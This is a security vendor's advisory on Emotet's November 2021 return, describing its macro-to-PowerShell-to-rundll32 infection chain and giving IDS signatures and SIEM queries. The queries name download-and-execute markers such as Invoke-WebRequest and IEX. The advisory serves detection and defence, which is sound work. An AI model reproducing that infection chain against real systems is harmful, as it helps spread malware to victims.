Emotet is back

Emotet is one of the longest-lasting cybercrime services in existence, with their first banking Trojan identified in 2014. On January 27, 2021, a team of law enforcement agencies from around the world announced that they seized and took down the Emotet infrastructure and arrested an undisclosed number of operators as part of Operation LadyBird(https://perchsecurity.com/perch-news/ddos-crypto-and-ransomware-oh-my/). Emotet was one of the most heavily distributed malware families of 2020. It was primarily distributed via malicious spam with Word or Excel documents attached. Emotet operated as malware-as-a-service and was typically paired with other malware, such as Trickbot, and frequently resulted in various ransomware attacks. Since the initial takedown, there has been no word of any Emotet activity until this week.

On Monday, November 15, word began leaking of a new version of Emotet being distributed. The initial sighting showed an Emotet DLL being downloaded by Trickbot, but since then multiple reports have come in of new malicious emails with malicious Emotet attachments spoofing replies from stolen email chains, presumably originating from already infected hosts. The attachments observed so far have been Word *.DOCM, Excel *.XLSM, or Zip files. The newer version of Emotet is mostly the same as the older version; however, the new version now encrypts C2 traffic via HTTPS instead of relying on unencrypted HTTP. So far, all of the newer Emotet C2 servers that have been identified have been using a self-signed certificate with the same subject line, so the CRU has pushed out a new signature to all Perch customers that will identify any outbound HTTPS traffic on any networks monitored by the Perch IDS attempting to connect to one of these new Emotet C2 servers:

alert tls $HOME_NET any -> $EXTERNAL_NET any (msg:"[ConnectWise CRU] Emotet (20211114) SSL/TLS Certificate M2";flow:established, to_client; tls.cert_subject; content:"C=GB, ST=London, L=London, O=Global Security, OU=IT Department, CN=example.com"; reference:md5, bc3532085a0b4febd9eed51aac2180d0; classtype:trojan-activity; sid:900495; rev:1; metadata: created_at 2021_11_14, updated_at 2021_11_14;)

The CRU has managed to obtain a few samples of the new version of Emotet and have also identified a few log artifacts that indicate an Emotet infection. When a user opens an infected Word or Excel attachment, embedded macros will execute a PowerShell script through cmd.exe. This PowerShell script downloads the Emotet DLL which is then executed with rundll32.exe. We have added two new signatures to the ConnectWise CRU collection in the Perch Marketplace to help identify this activity. We recommend all Perch SIEM customers install the CRU collection and enable PowerShell script block logging for optimal visibility (https://docs.microsoft.com/en-us/powershell/scripting/windows-powershell/wmf/whats-new/script-logging?view=powershell-7.2). The two new Emotet signatures in the CRU collection are:

[CRU][Windows] Emotet (Operation Reacharound) Powershell Activity
	winlog.event_data.ParentImage:"cmd.exe" AND winlog.event_data.CommandLine:("Invoke-WebRequest -Uri" AND "Start-Process" AND "ArgumentList" AND "IEX")

[CRU][Windows] Emotet (Operation Reacharound) Rundll.exe Activity
	winlog.event_data.Image:"rundll32.exe" AND winlog.event_data.CommandLine:("AppData\Local\Temp Control_RunDLL")

The email headers from the malicious emails we have observed include a unique MIME /Content-Type that can also be used to identify malicious emails coming into mail servers being monitored by the Perch IDS. We have added the following signature to all Perch IDS customers to help identify this activity:

alert smtp $EXTERNAL_NET any -> $HOME_NET [25,587] (msg:"[ConnectWise CRU] Emotet (Operation Reacharound) Email MIME/Content-Type"; flow:to_server,established; content:"|0d 0a|MIME-Version|3a 20|1.0|0d 0a|Content-Type|3a 20|multipart/mixed|3b 20|boundary|3d 22 2d 2d|"; pcre:"/(\x2d\x2d\x3d_Part_|\x2d\x2d\x3d_NextPart_|\x3d\x3d_mimepart_)/R"; tag:session,5,packets; classtype:trojan-activity; sid:900496; rev:1; metadata: created_at 2021_11_16, updated_at 2021_11_16;)

As always, all the IDS signatures have automatically been added to all ConnectWise Perch IDS sensors and the SIEM rules are available in the ConnectWise CRU collection available in the Perch Marketplace. If you are subscribed the ConnectWise CRU collection all new content is automatically added to your environment. If you need any assistance enabling the ConnectWise CRU collection, please contact the ConnectWise SOC (https://www.connectwise.com/company/partner-services/support).